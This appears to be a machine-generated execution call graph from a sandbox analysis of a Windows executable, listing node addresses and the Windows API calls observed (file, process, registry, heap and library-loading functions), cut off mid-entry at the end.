                                                                                                                                                                                                                                                                            execution_graph 50695 90ce90 30 API calls 50696 910090 95 API calls 50699 930e90 46 API calls 2 library calls 50700 8f9489 60 API calls 50701 90fa97 54 API calls 50703 8e9280 52 API calls 50704 8e9880 67 API calls 49648 90de80 CompareStringA 49649 90df6c CreateFileA 49648->49649 49650 90debf GetCurrentProcess GetCurrentProcess DuplicateHandle 49648->49650 49651 90df8c GetLastError 49649->49651 49656 90deec 49649->49656 49652 90dee0 GetLastError 49650->49652 49653 90df2f 49650->49653 49655 90df98 49651->49655 49652->49656 49657 90dcd9 6 API calls 49653->49657 49655->49656 49657->49656 50706 8e6c99 76 API calls 50707 902de9 249 API calls 50708 901d00 295 API calls 50707->50708 50710 93b0b7 InitializeCriticalSection 50713 8e90a0 57 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 50191 90e0a0 50192 90e0cd 50191->50192 50193 90e0d7 50192->50193 50194 90e14a SetFilePointerEx 50192->50194 50194->50193 50195 90e162 GetLastError 50194->50195 50195->50193 50715 8e72bf 374 API calls 50718 9232af 119 API calls 50720 8e94b0 GetProcessHeap RtlFreeHeap GetLastError GetProcessHeap HeapSize 50721 8e96b0 15 API calls 48418 9268d2 48419 9268de ___scrt_is_nonwritable_in_current_image 48418->48419 48443 926cb0 48419->48443 48421 9268e5 48422 926a38 48421->48422 48432 92690f ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 48421->48432 48462 926faf 4 API calls 2 library calls 48422->48462 48424 926a3f 48455 92e779 48424->48455 48428 926a4d 48429 92692e 48430 9269af 48451 9270ca 48430->48451 48432->48429 48432->48430 48458 92e753 41 API calls 3 library calls 48432->48458 48434 9269b5 48435 9269ca 48434->48435 48459 927100 GetModuleHandleW 48435->48459 48437 9269d1 48437->48424 48438 9269d5 48437->48438 48439 9269de 48438->48439 48460 92e72e 21 API calls _unexpected 48438->48460 48461 926e21 75 API calls ___scrt_uninitialize_crt 48439->48461 48442 9269e6 48442->48429 48444 926cb9 48443->48444 48464 927255 IsProcessorFeaturePresent 48444->48464 48446 926cc5 48465 9294ae 10 API calls 2 library calls 48446->48465 48448 926cca 48449 926cce 48448->48449 48466 9294cd 7 API calls 2 library calls 48448->48466 48449->48421 48467 927460 48451->48467 48454 9270f0 48454->48434 48469 92e5ad 48455->48469 48458->48430 48459->48437 48460->48439 48461->48442 48462->48424 48463 92e73d 21 API calls _unexpected 48463->48428 48464->48446 48465->48448 48466->48449 48468 9270dd GetStartupInfoW 48467->48468 48468->48454 48470 92e5da 48469->48470 48471 92e5ec 48469->48471 48496 927100 GetModuleHandleW 48470->48496 48481 92e45d 48471->48481 48474 92e5df 48474->48471 48497 92e68e GetModuleHandleExW 48474->48497 48476 926a45 48476->48463 48480 92e63e 48482 92e469 ___scrt_is_nonwritable_in_current_image 48481->48482 48503 9320b1 EnterCriticalSection 48482->48503 48484 92e473 48504 92e4c5 48484->48504 48486 92e480 48508 92e49e 48486->48508 48489 92e644 48513 92e675 48489->48513 48491 92e64e 48492 92e662 48491->48492 48493 92e652 GetCurrentProcess TerminateProcess 48491->48493 48494 92e68e _unexpected 3 API calls 48492->48494 48493->48492 48495 92e66a ExitProcess 48494->48495 48496->48474 48498 92e6ee 48497->48498 48499 92e6cd GetProcAddress 48497->48499 48501 92e6f4 FreeLibrary 48498->48501 48502 92e5eb 48498->48502 48499->48498 48500 92e6e1 48499->48500 48500->48498 48501->48502 48502->48471 48503->48484 48507 92e4d1 ___scrt_is_nonwritable_in_current_image _unexpected 48504->48507 48505 92e535 _unexpected 48505->48486 48507->48505 48511 92ebbd 14 API calls 2 library calls 48507->48511 48512 932101 LeaveCriticalSection 48508->48512 48510 92e48c 48510->48476 48510->48489 48511->48505 48512->48510 48516 93213d 5 API calls _unexpected 48513->48516 48515 92e67a _unexpected 48515->48491 48516->48515 50723 91fad0 84 API calls 50724 90fad1 54 API calls 48518 94c2d6 48520 94c1e1 48518->48520 48521 94c6ef 48520->48521 48547 94c44d 48521->48547 48524 94c75c 48525 94c68d DloadReleaseSectionWriteAccess 8 API calls 48524->48525 48526 94c767 RaiseException 48525->48526 48541 94c955 48526->48541 48527 94c7f8 LoadLibraryExA 48528 94c859 48527->48528 48529 94c80b GetLastError 48527->48529 48534 94c864 FreeLibrary 48528->48534 48535 94c86b 48528->48535 48531 94c834 48529->48531 48539 94c81e 48529->48539 48530 94c927 48553 94c68d 48530->48553 48536 94c68d DloadReleaseSectionWriteAccess 8 API calls 48531->48536 48532 94c8c9 GetProcAddress 48532->48530 48537 94c8d9 GetLastError 48532->48537 48533 94c780 48533->48527 48533->48528 48533->48530 48533->48535 48534->48535 48535->48530 48535->48532 48540 94c83f RaiseException 48536->48540 48543 94c8ec 48537->48543 48539->48528 48539->48531 48540->48541 48541->48520 48542 94c68d DloadReleaseSectionWriteAccess 8 API calls 48544 94c90d RaiseException 48542->48544 48543->48530 48543->48542 48545 94c44d ___delayLoadHelper2@8 7 API calls 48544->48545 48546 94c924 48545->48546 48546->48530 48548 94c459 48547->48548 48551 94c47a 48547->48551 48561 94c4f6 48548->48561 48550 94c45e 48550->48551 48566 94c61f 48550->48566 48551->48524 48551->48533 48554 94c6c1 48553->48554 48555 94c69f 48553->48555 48554->48541 48556 94c4f6 DloadReleaseSectionWriteAccess 4 API calls 48555->48556 48557 94c6a4 48556->48557 48558 94c6bc 48557->48558 48559 94c61f DloadProtectSection 3 API calls 48557->48559 48573 94c6c3 GetModuleHandleW GetProcAddress GetProcAddress RtlReleaseSRWLockExclusive DloadReleaseSectionWriteAccess 48558->48573 48559->48558 48571 94c480 GetModuleHandleW GetProcAddress GetProcAddress 48561->48571 48563 94c4fb 48564 94c513 RtlAcquireSRWLockExclusive 48563->48564 48565 94c517 48563->48565 48564->48550 48565->48550 48567 94c634 DloadProtectSection 48566->48567 48568 94c66f VirtualProtect 48567->48568 48569 94c63a 48567->48569 48572 94c535 VirtualQuery GetSystemInfo 48567->48572 48568->48569 48569->48551 48571->48563 48572->48568 48573->48554 50725 92ecd0 7 API calls ___scrt_uninitialize_crt 50726 8f90c9 130 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 48577 8e7cc6 48578 8e7ccb 48577->48578 48587 8e4456 SetLastError GetModuleFileNameW 48578->48587 48580 8e7cfd 48605 8e8119 48580->48605 48583 8e7d48 48608 903fe2 48583->48608 48588 8e44be 48587->48588 48589 8e4484 GetLastError 48587->48589 48590 8e4559 48588->48590 48591 8e44c9 GetLastError 48588->48591 48601 8e4490 48589->48601 48592 8e29c8 52 API calls 48590->48592 48591->48590 48593 8e44d8 48591->48593 48596 8e44e3 48592->48596 48664 8e37f3 48593->48664 48595 8e4508 SetLastError 48598 8e450f GetModuleFileNameW 48595->48598 48596->48595 48597 8e4502 48596->48597 48596->48601 48597->48595 48599 8e45b4 GetLastError 48598->48599 48600 8e4525 GetLastError 48598->48600 48604 8e4554 48599->48604 48600->48601 48603 8e4534 48600->48603 48601->48580 48603->48598 48603->48604 48668 8e29c8 48603->48668 48604->48601 48685 93b07f 48605->48685 48609 904005 _memcpy_s 48608->48609 48776 8eaa6f InitializeCriticalSection 48609->48776 48616 904455 48805 8eeaf6 48616->48805 48621 90445e 48622 90446c 48621->48622 48834 8e367f GetProcessHeap RtlFreeHeap GetLastError 48621->48834 48625 90447a 48622->48625 48835 8e367f GetProcessHeap RtlFreeHeap GetLastError 48622->48835 48627 8e7d5b 48625->48627 48809 8e55c9 GetProcessHeap RtlFreeHeap 48625->48809 48629 9040b9 48641 904020 48629->48641 48812 902372 59 API calls 48629->48812 48631 904112 48632 8e8119 72 API calls 48631->48632 48631->48641 48633 904145 48632->48633 48634 904152 48633->48634 48635 90418c 48633->48635 48813 93acf6 72 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 48634->48813 48814 904491 60 API calls 48635->48814 48638 904192 48638->48641 48815 8eb861 80 API calls 48638->48815 48640 9041c5 48640->48641 48816 8eb861 80 API calls 48640->48816 48641->48616 48833 8e367f GetProcessHeap RtlFreeHeap GetLastError 48641->48833 48643 904246 48643->48641 48645 9042dd 48643->48645 48646 8eb89c 80 API calls 48643->48646 48644 904207 48644->48641 48644->48643 48817 8eb89c 48644->48817 48645->48641 48648 904314 48645->48648 48650 8eb89c 80 API calls 48645->48650 48649 904282 48646->48649 48648->48641 48652 904361 48648->48652 48824 8ff752 110 API calls 48648->48824 48649->48641 48820 8e4601 48649->48820 48650->48648 48652->48641 48825 8f2b07 95 API calls 48652->48825 48654 9042ae 48654->48641 48656 8eb89c 80 API calls 48654->48656 48656->48645 48657 9043a5 48657->48641 48826 8ef4db 89 API calls 48657->48826 48659 9043d1 48659->48641 48827 8e3db5 48659->48827 48663 8e367f GetProcessHeap RtlFreeHeap GetLastError 48663->48583 48665 8e37ff 48664->48665 48667 8e380b 48664->48667 48671 8e593a GetProcessHeap HeapSize 48665->48671 48667->48596 48672 8e1c76 48668->48672 48670 8e29d8 48670->48603 48671->48667 48673 8e1cae 48672->48673 48681 8e1c88 48672->48681 48674 8e1cb9 48673->48674 48675 8e1d01 48673->48675 48676 8e1cf6 48674->48676 48677 8e1cc0 48674->48677 48684 8e540b GetProcessHeap RtlAllocateHeap 48675->48684 48683 8e56c2 GetProcessHeap HeapReAlloc 48676->48683 48682 8e5810 50 API calls _memcpy_s 48677->48682 48681->48670 48682->48681 48683->48681 48684->48681 48686 93b08a 48685->48686 48687 8e7d31 48686->48687 48689 93a747 FormatMessageW 48686->48689 48687->48583 48687->48663 48690 93a772 GetLastError 48689->48690 48691 93a77e 48689->48691 48690->48691 48693 93a78b 48691->48693 48696 93a805 48691->48696 48694 93a7f5 LocalFree 48693->48694 48695 93a7fe 48693->48695 48694->48695 48695->48687 48697 93a82e EnterCriticalSection 48696->48697 48698 93a9ed 48696->48698 48700 93a842 GetCurrentProcessId GetCurrentThreadId GetLocalTime 48697->48700 48701 93a935 48697->48701 48739 9267e6 48698->48739 48703 93a87f 48700->48703 48716 8e327c 48701->48716 48702 93a9fb 48702->48693 48734 8e2acf 48703->48734 48705 93a94f 48714 93a923 48705->48714 48731 93b3f2 EnterCriticalSection 48705->48731 48709 93a914 48709->48714 48710 93a9c6 LeaveCriticalSection 48711 93a9d7 48710->48711 48712 93a9df 48710->48712 48737 8e367f GetProcessHeap RtlFreeHeap GetLastError 48711->48737 48712->48698 48738 8e367f GetProcessHeap RtlFreeHeap GetLastError 48712->48738 48714->48710 48717 8e32a1 48716->48717 48718 8e3296 48716->48718 48719 8e32ce WideCharToMultiByte 48717->48719 48722 8e3333 48717->48722 48730 8e32a7 48717->48730 48746 8e3840 GetProcessHeap HeapSize 48718->48746 48721 8e32e7 GetLastError 48719->48721 48719->48722 48721->48730 48724 8e3389 48722->48724 48725 8e3380 48722->48725 48729 8e3387 48722->48729 48722->48730 48723 8e33d4 WideCharToMultiByte 48726 8e33f0 GetLastError 48723->48726 48723->48730 48748 8e540b GetProcessHeap RtlAllocateHeap 48724->48748 48747 8e56c2 GetProcessHeap HeapReAlloc 48725->48747 48726->48730 48729->48723 48729->48730 48730->48705 48749 93aabf 48731->48749 48733 93b40b LeaveCriticalSection 48733->48714 48758 8e2ae3 48734->48758 48737->48712 48738->48698 48740 9267ee 48739->48740 48741 9267ef IsProcessorFeaturePresent 48739->48741 48740->48702 48743 926b55 48741->48743 48775 926b18 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 48743->48775 48745 926c38 48745->48702 48746->48717 48747->48729 48748->48729 48750 93aae2 48749->48750 48751 93ab4b 48750->48751 48752 93ab1e 48750->48752 48756 93aae8 48750->48756 48754 93ab50 WriteFile 48751->48754 48751->48756 48757 8e3145 6 API calls 48752->48757 48754->48751 48755 93ab6b GetLastError 48754->48755 48755->48751 48756->48733 48757->48756 48761 8e1ae9 48758->48761 48760 8e2ae1 48760->48701 48760->48709 48762 8e1b02 48761->48762 48766 8e1b0c 48761->48766 48772 8e593a GetProcessHeap HeapSize 48762->48772 48763 8e1c76 52 API calls 48769 8e1b87 48763->48769 48766->48763 48767 8e1b12 48766->48767 48766->48769 48767->48760 48768 8e1bfd 48768->48767 48774 8e367f GetProcessHeap RtlFreeHeap GetLastError 48768->48774 48769->48767 48769->48768 48770 8e1c76 52 API calls 48769->48770 48773 8e26b9 45 API calls __vsnwprintf_l 48769->48773 48770->48769 48772->48766 48773->48769 48774->48767 48775->48745 48777 8eb448 48776->48777 48779 8eb483 48777->48779 48781 8eb4a3 48777->48781 48836 8e813a 48777->48836 48779->48781 48841 8e8218 54 API calls 48779->48841 48782 9267e6 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 48781->48782 48783 8eb4ee 48782->48783 48783->48641 48784 8eed7b 48783->48784 48785 8eed9b _memcpy_s 48784->48785 48786 8e4456 60 API calls 48785->48786 48790 8eedca 48785->48790 48787 8eede8 48786->48787 48787->48790 48858 8eebdb 48787->48858 48789 8eee48 48789->48641 48792 8eebba 48789->48792 48790->48789 48869 8e367f GetProcessHeap RtlFreeHeap GetLastError 48790->48869 48793 8eebca 48792->48793 48794 8eebd3 48792->48794 48901 90ee35 8 API calls 48793->48901 48794->48641 48796 8eee6f 48794->48796 48797 8eee8b 48796->48797 48798 8eee7f 48796->48798 48902 90f028 8 API calls 48797->48902 48798->48641 48800 923ce0 48798->48800 48903 94061b VariantInit 48800->48903 48804 923cfe 48804->48629 48806 8eeb08 48805->48806 48808 8eeb0e _memcpy_s 48805->48808 48921 90ed3e 7 API calls 48806->48921 48808->48621 48810 8e55f0 48809->48810 48811 8e55e4 GetLastError 48809->48811 48810->48627 48811->48810 48812->48631 48813->48641 48814->48638 48815->48640 48816->48644 48922 8ea0d7 EnterCriticalSection 48817->48922 48821 8e4614 48820->48821 48823 8e4653 48820->48823 48822 8e2eaf 52 API calls 48821->48822 48821->48823 48822->48823 48823->48654 48824->48652 48825->48657 48826->48659 48982 8e3dce 48827->48982 48829 8e3dca 48829->48641 48830 8e2eaf 48829->48830 49003 8e1d40 48830->49003 48832 8e2ec2 48832->48641 48833->48616 48834->48622 48835->48625 48842 8e8306 48836->48842 48838 8e8154 48840 8e815a 48838->48840 48847 8e9f0a 48838->48847 48840->48777 48841->48779 48843 8e8320 CompareStringW 48842->48843 48846 8e837d 48842->48846 48844 8e834d 48843->48844 48844->48843 48845 8e8371 GetLastError 48844->48845 48844->48846 48845->48846 48846->48838 48849 8e9f26 48847->48849 48854 8e9fa3 _memcpy_s 48847->48854 48848 8e2eaf 52 API calls 48855 8e9f35 48848->48855 48850 8ea092 48849->48850 48852 8e9f67 48849->48852 48849->48855 48857 8e540b GetProcessHeap RtlAllocateHeap 48850->48857 48852->48855 48856 8e56c2 GetProcessHeap HeapReAlloc 48852->48856 48854->48848 48854->48855 48855->48840 48856->48854 48857->48854 48859 8eec0d 48858->48859 48860 8eec80 GetCurrentProcess GetCurrentProcess DuplicateHandle 48858->48860 48861 8eecda SetFilePointerEx 48859->48861 48863 8eec31 GetLastError 48859->48863 48860->48861 48862 8eeca0 GetLastError 48860->48862 48865 8eed3c 48861->48865 48866 8eecfb GetLastError 48861->48866 48868 8eec3d 48862->48868 48863->48868 48865->48868 48870 90ee8b 48865->48870 48866->48868 48868->48790 48869->48789 48871 8e2eaf 52 API calls 48870->48871 48872 90eea7 48871->48872 48873 90eec4 CreateEventW 48872->48873 48881 90eead 48872->48881 48874 90eed6 GetLastError 48873->48874 48875 90ef1a CreateEventW 48873->48875 48874->48881 48876 90ef63 CreateThread 48875->48876 48877 90ef2c GetLastError 48875->48877 48878 90efb4 48876->48878 48879 90ef7a GetLastError 48876->48879 48883 90e800 CoInitializeEx 48876->48883 48877->48881 48882 90ec24 6 API calls 48878->48882 48879->48881 48881->48868 48882->48881 48884 90e831 48883->48884 48895 90e855 48883->48895 48885 9267e6 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 48884->48885 48886 90eae2 48885->48886 48887 90e9ca SetEvent 48888 90ea20 48887->48888 48889 90e9d7 GetLastError 48887->48889 48897 8e174a WaitForSingleObject 48888->48897 48896 90e8a5 48889->48896 48891 90eacd CoUninitialize 48891->48884 48892 90ea2a 48893 90ea49 ResetEvent 48892->48893 48892->48896 48894 90ea56 GetLastError 48893->48894 48893->48896 48894->48896 48895->48887 48895->48896 48896->48891 48898 8e176a 48897->48898 48900 8e1763 48897->48900 48899 8e1795 GetLastError 48898->48899 48898->48900 48899->48900 48900->48892 48901->48794 48902->48798 48909 93fe01 GetModuleHandleA 48903->48909 48905 9267e6 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 48906 923cf8 48905->48906 48906->48804 48908 92396f 201 API calls 48906->48908 48907 940662 48907->48905 48908->48804 48910 93fea6 GetProcAddress 48909->48910 48911 93fe2b GetLastError 48909->48911 48912 93ff16 CoCreateInstance 48910->48912 48913 93feb6 GetProcAddress GetProcAddress GetProcAddress 48910->48913 48918 93fe37 48911->48918 48915 93ff58 48912->48915 48917 93ff37 48912->48917 48914 93fee8 48913->48914 48914->48912 48915->48917 48920 94003b SysAllocString SysFreeString 48915->48920 48917->48918 48919 940032 ExitProcess 48917->48919 48918->48907 48920->48917 48921->48808 48923 8e8306 2 API calls 48922->48923 48924 8ea0fa 48923->48924 48925 8e9f0a 52 API calls 48924->48925 48932 8ea100 48924->48932 48934 8ea127 48924->48934 48925->48934 48926 8ea270 48947 90dbcf 52 API calls 48926->48947 48928 8ea2ac LeaveCriticalSection 48930 8ea2cb 48928->48930 48931 8ea2b7 48928->48931 48929 8ea1c5 48935 8ea2d7 73 API calls 48929->48935 48939 8ea1fe 48929->48939 48930->48643 48931->48930 48936 8ea2d7 73 API calls 48931->48936 48932->48928 48933 8ea21a 48933->48929 48937 8ea203 48933->48937 48934->48926 48934->48929 48934->48932 48934->48933 48934->48937 48938 8ea1e4 48934->48938 48935->48939 48936->48930 48944 8ea2d7 48937->48944 48938->48929 48938->48939 48942 8ea1ef 48938->48942 48939->48926 48941 8e8119 72 API calls 48939->48941 48941->48926 48943 8ea2d7 73 API calls 48942->48943 48943->48939 48948 93b3c8 48944->48948 48947->48932 48949 93b3d3 48948->48949 48950 8ea2e9 48949->48950 48952 93a9ff 48949->48952 48950->48939 48963 8e2ec6 48952->48963 48954 93aa1c 48955 93aa22 48954->48955 48956 8e2ae3 56 API calls 48954->48956 48960 93aaaa 48955->48960 48978 8e367f GetProcessHeap RtlFreeHeap GetLastError 48955->48978 48957 93aa4f 48956->48957 48957->48955 48958 93a805 69 API calls 48957->48958 48958->48955 48959 93aab7 48959->48950 48960->48959 48979 8e367f GetProcessHeap RtlFreeHeap GetLastError 48960->48979 48964 8e2ede 48963->48964 48965 8e2ee9 48963->48965 48966 8e37f3 2 API calls 48964->48966 48967 8e2f14 MultiByteToWideChar 48965->48967 48970 8e2eef 48965->48970 48971 8e2f77 48965->48971 48966->48965 48968 8e2f2b GetLastError 48967->48968 48967->48971 48968->48970 48969 8e2fcb 48969->48970 48972 8e3018 MultiByteToWideChar 48969->48972 48970->48954 48971->48969 48971->48970 48973 8e2fcd 48971->48973 48974 8e2fc4 48971->48974 48972->48970 48975 8e3031 GetLastError 48972->48975 48981 8e540b GetProcessHeap RtlAllocateHeap 48973->48981 48980 8e56c2 GetProcessHeap HeapReAlloc 48974->48980 48975->48970 48978->48960 48979->48959 48980->48969 48981->48969 48983 8e3dde 48982->48983 48984 8e3e8a 48982->48984 48983->48984 48988 8e3de9 48983->48988 48985 8e2eaf 52 API calls 48984->48985 48989 8e3e11 48985->48989 48986 8e3e67 48987 8e2eaf 52 API calls 48986->48987 48987->48989 48988->48986 48990 8e3dff 48988->48990 48989->48829 48991 8e2eaf 52 API calls 48990->48991 48992 8e3e0b 48991->48992 48992->48989 48996 8e3cfd 48992->48996 48994 8e3e2d 48994->48989 49001 8e29dc 52 API calls 48994->49001 48997 8e37f3 2 API calls 48996->48997 49000 8e3d1a 48997->49000 48998 8e3d20 48998->48994 49000->48998 49002 8e29dc 52 API calls 49000->49002 49001->48989 49002->48998 49004 8e1d53 49003->49004 49006 8e1d5e 49003->49006 49005 8e37f3 2 API calls 49004->49005 49005->49006 49007 8e1d64 49006->49007 49008 8e1c76 52 API calls 49006->49008 49007->48832 49008->49007 50727 93c0da GetProcessHeap RtlAllocateHeap 50728 9310d8 42 API calls 3 library calls 50730 93c8c3 70 API calls 50731 9268c0 42 API calls 50734 9372cf 20 API calls __vsnwprintf_l 50735 8f92d2 58 API calls 50736 8ed6d3 103 API calls 49692 8e74ee 49718 8fa5be 49692->49718 49695 8e4456 60 API calls 49698 8e7575 49695->49698 49696 8e76b8 IsWindow 49697 8e76c5 PostMessageW 49696->49697 49702 8e76d4 49696->49702 49697->49702 49700 8e759f 49698->49700 49709 8e7546 49698->49709 49764 8fe4a9 49698->49764 49700->49709 49771 90347d 49700->49771 49817 8e3886 49702->49817 49703 8e75e8 49703->49709 49803 8e2b11 49703->49803 49708 8e3886 5 API calls 49710 8e7727 49708->49710 49709->49696 49712 8e7735 49710->49712 49822 8e367f GetProcessHeap RtlFreeHeap GetLastError 49710->49822 49715 8e7743 49712->49715 49823 8e367f GetProcessHeap RtlFreeHeap GetLastError 49712->49823 49713 8e7659 49713->49709 49811 93bf20 49713->49811 49719 8fa5e0 49718->49719 49824 8f9fd1 49719->49824 49722 8fa700 49725 8fa7f7 49722->49725 49726 8fa660 49722->49726 49741 8fa738 49722->49741 49723 8e2eaf 52 API calls 49724 8fa634 49723->49724 49724->49722 49724->49726 49727 8fa6a5 49724->49727 49868 93b350 73 API calls 49724->49868 49729 8fa80f 49725->49729 49833 8ea7ad 49725->49833 49730 8fa99c 49726->49730 49874 8e367f GetProcessHeap RtlFreeHeap GetLastError 49726->49874 49727->49722 49733 8e2eaf 52 API calls 49727->49733 49731 8fa8c1 49729->49731 49743 8fa827 49729->49743 49735 8e3886 5 API calls 49730->49735 49873 93ac92 GetProcessHeap RtlFreeHeap GetLastError EnterCriticalSection LeaveCriticalSection 49731->49873 49732 8fa744 Sleep 49732->49741 49739 8fa6cd 49733->49739 49740 8e7540 49735->49740 49738 93b0e2 124 API calls 49738->49741 49739->49722 49739->49726 49747 8e2eaf 52 API calls 49739->49747 49740->49695 49740->49709 49741->49732 49741->49738 49746 8fa785 49741->49746 49742 8fa896 49872 8fa07c 73 API calls 49742->49872 49743->49742 49745 8fa83b 49743->49745 49749 8e4601 52 API calls 49745->49749 49753 8fa79c 49746->49753 49869 93ac92 GetProcessHeap RtlFreeHeap GetLastError EnterCriticalSection LeaveCriticalSection 49746->49869 49747->49722 49748 8fa847 49748->49726 49748->49753 49836 93b0e2 EnterCriticalSection 49748->49836 49749->49748 49752 8fa791 49752->49753 49870 90d2ec 56 API calls 49752->49870 49753->49726 49756 8e2eaf 52 API calls 49753->49756 49763 8fa92a 49753->49763 49754 8e2eaf 52 API calls 49760 8fa955 49754->49760 49758 8fa8fd 49756->49758 49761 8e2eaf 52 API calls 49758->49761 49760->49726 49762 8eb89c 80 API calls 49760->49762 49761->49763 49762->49726 49763->49754 49763->49760 49765 8e4456 60 API calls 49764->49765 49766 8fe4bd 49765->49766 49767 8fe4c3 49766->49767 49992 8fcc1b 49766->49992 49769 8fe529 49767->49769 50011 8e367f GetProcessHeap RtlFreeHeap GetLastError 49767->50011 49769->49700 49772 8e2acf 56 API calls 49771->49772 49773 9034a2 49772->49773 49800 9034ab 49773->49800 50077 902ad9 GetCurrentProcess GetCurrentProcess DuplicateHandle 49773->50077 49775 9034d1 49775->49800 50082 902bbd 49775->50082 49777 90350e 49777->49800 50088 902c8f 56 API calls 49777->50088 49779 9035a3 49779->49800 50091 901c8a 52 API calls 49779->50091 49780 903539 49780->49779 49780->49800 50089 8e29f3 56 API calls 49780->50089 49782 9035cf 49785 903623 49782->49785 49786 9035f4 49782->49786 49782->49800 49784 90357a 49784->49800 50090 8e146c 52 API calls 49784->50090 50093 8e29dc 52 API calls 49785->50093 49787 903606 49786->49787 50092 8e29dc 52 API calls 49786->50092 49791 903660 49787->49791 49787->49800 50094 8e29dc 52 API calls 49787->50094 49791->49800 49802 9036b6 49791->49802 50095 8e29dc 52 API calls 49791->50095 49794 903690 49794->49800 50096 8e146c 52 API calls 49794->50096 49798 9036fd 49799 903733 49798->49799 49798->49800 50098 8e29f3 56 API calls 49798->50098 49799->49800 50099 901d8a 56 API calls 49799->50099 49800->49703 49802->49798 49802->49800 50097 8e29f3 56 API calls 49802->50097 50103 8e2afa 49803->50103 49806 9037dc 49807 9037f5 _memcpy_s 49806->49807 49808 903844 CreateProcessW 49807->49808 49809 90384a GetLastError 49808->49809 49810 903856 49808->49810 49809->49810 49810->49713 49812 8e174a 2 API calls 49811->49812 49813 93bf2f 49812->49813 49814 93bf66 GetExitCodeProcess 49813->49814 49816 93bf42 49813->49816 49815 93bf76 GetLastError 49814->49815 49814->49816 49815->49816 49816->49709 50106 8e38a9 49817->50106 49819 8e3892 49820 8e38a2 49819->49820 50110 8e367f GetProcessHeap RtlFreeHeap GetLastError 49819->50110 49820->49708 49822->49712 49823->49715 49875 93cba8 49824->49875 49828 8fa069 49830 8fa06f RegCloseKey 49828->49830 49831 8fa078 49828->49831 49830->49831 49831->49723 49831->49724 49832 8fa00c 49832->49828 49879 8e367f GetProcessHeap RtlFreeHeap GetLastError 49832->49879 49884 8e83d7 EnterCriticalSection 49833->49884 49835 8ea7c5 49835->49729 49837 93b104 49836->49837 49838 93b13d 49836->49838 49837->49838 49839 93b109 49837->49839 49840 8e3db5 52 API calls 49838->49840 49938 8e3ec2 49839->49938 49845 93b14c 49840->49845 49842 93b122 49843 93b295 49842->49843 49844 93b29a 49842->49844 49867 93b12c 49842->49867 49983 93af11 90 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 49843->49983 49847 93b2b8 49844->49847 49850 93b3f2 10 API calls 49844->49850 49853 93b17e 49845->49853 49845->49867 49969 8e417b 60 API calls 49845->49969 49848 93b2f4 LeaveCriticalSection 49847->49848 49856 8e2eaf 52 API calls 49847->49856 49851 93b305 49848->49851 49852 93b30d 49848->49852 49854 93b2a9 49850->49854 49985 8e367f GetProcessHeap RtlFreeHeap GetLastError 49851->49985 49858 8fa885 49852->49858 49986 8e367f GetProcessHeap RtlFreeHeap GetLastError 49852->49986 49855 8e4601 52 API calls 49853->49855 49853->49867 49854->49847 49984 8e367f GetProcessHeap RtlFreeHeap GetLastError 49854->49984 49859 93b1b1 49855->49859 49856->49867 49858->49753 49871 93ac92 GetProcessHeap RtlFreeHeap GetLastError EnterCriticalSection LeaveCriticalSection 49858->49871 49859->49867 49970 8e6305 CreateDirectoryW 49859->49970 49863 93b1d4 49864 93b234 GetLastError 49863->49864 49866 93b240 49863->49866 49863->49867 49864->49866 49865 93b27f SetFilePointer 49865->49842 49866->49842 49866->49865 49866->49867 49867->49848 49868->49727 49869->49752 49870->49753 49871->49753 49872->49748 49873->49753 49874->49730 49880 93cbc2 49875->49880 49877 8f9ff7 49877->49832 49878 93cd94 58 API calls 49877->49878 49878->49832 49879->49828 49881 93cbd4 49880->49881 49882 93cbed RegOpenKeyExW 49881->49882 49883 93cbf4 49882->49883 49883->49877 49885 8e8417 49884->49885 49886 8e29c8 52 API calls 49885->49886 49887 8e8420 49885->49887 49890 8e8452 49886->49890 49888 8e8a0e LeaveCriticalSection 49887->49888 49889 8e8a57 49888->49889 49903 8e8a1e 49888->49903 49895 8e8a6a 49889->49895 49896 8e8a88 49889->49896 49890->49887 49891 8e8682 49890->49891 49912 8eb99a 52 API calls 49890->49912 49913 8e87a4 49890->49913 49920 8e2eaf 52 API calls 49890->49920 49924 8eb957 52 API calls 49890->49924 49925 8e56c2 GetProcessHeap HeapReAlloc 49890->49925 49926 8e540b GetProcessHeap RtlAllocateHeap 49890->49926 49927 8eb4f2 CompareStringW GetLastError EnterCriticalSection LeaveCriticalSection 49890->49927 49928 8e8b6f 64 API calls 49890->49928 49929 8e3089 52 API calls 49890->49929 49930 8eb979 56 API calls 49890->49930 49931 8eb957 52 API calls 49891->49931 49892 8e8a4b 49894 8e55c9 3 API calls 49892->49894 49894->49889 49899 8e8a78 49895->49899 49936 8e367f GetProcessHeap RtlFreeHeap GetLastError 49895->49936 49897 8e3886 5 API calls 49896->49897 49900 8e8a90 49897->49900 49898 8e8698 49898->49887 49901 8e86a5 49898->49901 49933 8eb938 52 API calls 49898->49933 49904 8e8a86 49899->49904 49937 8e367f GetProcessHeap RtlFreeHeap GetLastError 49899->49937 49906 8e3886 5 API calls 49900->49906 49901->49835 49903->49892 49905 8e3886 5 API calls 49903->49905 49935 8e367f GetProcessHeap RtlFreeHeap GetLastError 49903->49935 49904->49835 49905->49903 49910 8e8a98 49906->49910 49911 8e3886 5 API calls 49910->49911 49911->49904 49912->49890 49932 8eb957 52 API calls 49913->49932 49920->49890 49923 8e8963 49934 8eb99a 52 API calls 49923->49934 49924->49890 49925->49890 49926->49890 49927->49890 49928->49890 49929->49890 49930->49890 49931->49898 49932->49898 49933->49923 49934->49887 49935->49903 49936->49899 49937->49904 49939 8e3f4d 49938->49939 49940 8e3f14 49938->49940 49942 8e4dd8 70 API calls 49939->49942 49940->49939 49941 8e3f19 